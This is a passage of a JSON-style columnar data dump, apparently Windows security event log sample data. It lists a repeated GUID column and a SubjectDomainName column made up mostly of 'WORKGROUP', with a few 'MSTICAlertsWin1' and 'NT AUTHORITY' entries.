,\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NT AUTHORITY\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WO